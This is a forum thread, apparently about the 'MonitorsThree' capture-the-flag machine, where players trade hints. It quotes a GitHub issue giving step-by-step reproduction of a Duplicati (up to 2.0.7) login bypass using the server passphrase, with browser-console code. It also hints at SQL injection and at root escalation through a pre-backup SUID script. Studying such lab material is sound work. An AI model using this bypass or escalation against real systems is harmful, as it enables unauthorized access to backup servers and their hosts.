Let’s talk about MonitorsThree
. Please do not share a write-up or flag here.
Hex
August 24, 2024, 6:27pm
2
let’s go, last 30 minutes
Hex
August 24, 2024, 7:27pm
3
Trying to bypass login page with the valid username admin
Hex
August 24, 2024, 8:03pm
4
Somebody gotta learn how to prevent SQLi
Hex
August 24, 2024, 10:49pm
6
Privilege escalation was fun. Check these out:
marcus@monitorsthree:/opt$ cat docker-compose.yml
version: "3"
services:
duplicati:
image: lscr.io/linuxserver/duplicati:latest
container_name: duplicati
environment:
- PUID=0
- PGID=0
- TZ=Etc/UTC
volumes:
- /opt/duplicati/config:/config
- /:/source
ports:
- 127.0.0.1:8200:8200
restart: unless-stopped
opened 03:20PM - 18 May 24 UTC
closed 02:32PM - 12 Aug 24 UTC
- [ x ] I have searched open and closed issues for duplicates.
- [ x ] I have s… earched the [forum](https://forum.duplicati.com) for related topics.
----------------------------------------
## Environment info
- **Duplicati version**: <= 2.0.7
- **Operating system**: Linux
- **Backend**: Local
## Description
When Duplicati is configured with a login password , it is possible to bypass the login authentication using the Database server passphrase without actually knowing the correct password. The issue lies in the way the server passphrase is used to generate the authentication token.
https://github.com/duplicati/duplicati/blob/67c1213a98e9f98659f3d4b78ded82b80ddab8bb/Duplicati/Server/webroot/login/login.js
```
$.ajax({
url: './login.cgi',
type: 'POST',
dataType: 'json',
data: {'get-nonce': 1}
})
.done(function(data) {
var saltedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Utf8.parse($('#login-password').val()) + CryptoJS.enc.Base64.parse(data.Salt)));
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
$.ajax({
url: './login.cgi',
type: 'POST',
dataType: 'json',
data: {'password': noncedpwd }
})
```
First saltedpwd is the SHA256 hash of the plaintext password entered by the user concatenated with the salt. Then noncedpwd is the SHA256 hash of the nonce concatenated with saltedpwd, which is then sent as the password parameter to login.cgi.
## Steps to reproduce
1. Setup Duplicati with a login password
2. Open Duplicati DB using any tool (like sqlite)
3. Grab the (Server_passphrase)
4. Open Burp Suite and enable "Intercept".
5. Go to the Duplicati login page and enter any password.
6. Intercept the request in Burp Suite and select "Do intercept > Response to this request".
7. Analyze the intercepted response to retrieve the Nonce and Salt values.
8. Verify that the Salt matches the one from the Duplicati database and note that the Nonce changes with each request.
9. Convert the server passphrase from Base64 to Hex.
10. Open the browser console (Chrome/Firefox), type allow pasting, and run the following modified command:
```
var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);
```
11. Copy the noncedpwd value returned by the console.
12. In Burp Suite, forward the intercepted request and modify the password parameter with the noncedpwd value, URL encoding it if necessary (use CTRL+U in Burp Suite to URL encode).
13. Forward the request and observe that you are logged into the Duplicati web interface.
- **Actual result**:
Successfully logs into the Duplicati web interface without needing the login password, using the server passphrase.
- **Expected result**:
The server passphrase should not bypass the login authentication. Only the correct login password should grant access to the web interface.
## Screenshots
N/A
## Debug log
N/A
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
And you’ve got to find a way to escalate to root after bypassing Duplicati.
Hex
August 24, 2024, 10:49pm
7
DM me if you need more help
Hex
August 25, 2024, 3:41pm
8
Bypass the login page. For root access, configure a script to run before backups and include your SUID script method in it. Then, trigger the backup process
Hex
September 13, 2024, 2:21pm
10
Hey, click on my name and then click on the chat or message button and submit your message.
1 Like
laithay
September 23, 2024, 8:43am
11
Hello i got a reverse shell on this but I couldn’t get the key for Marcus user can I get a help?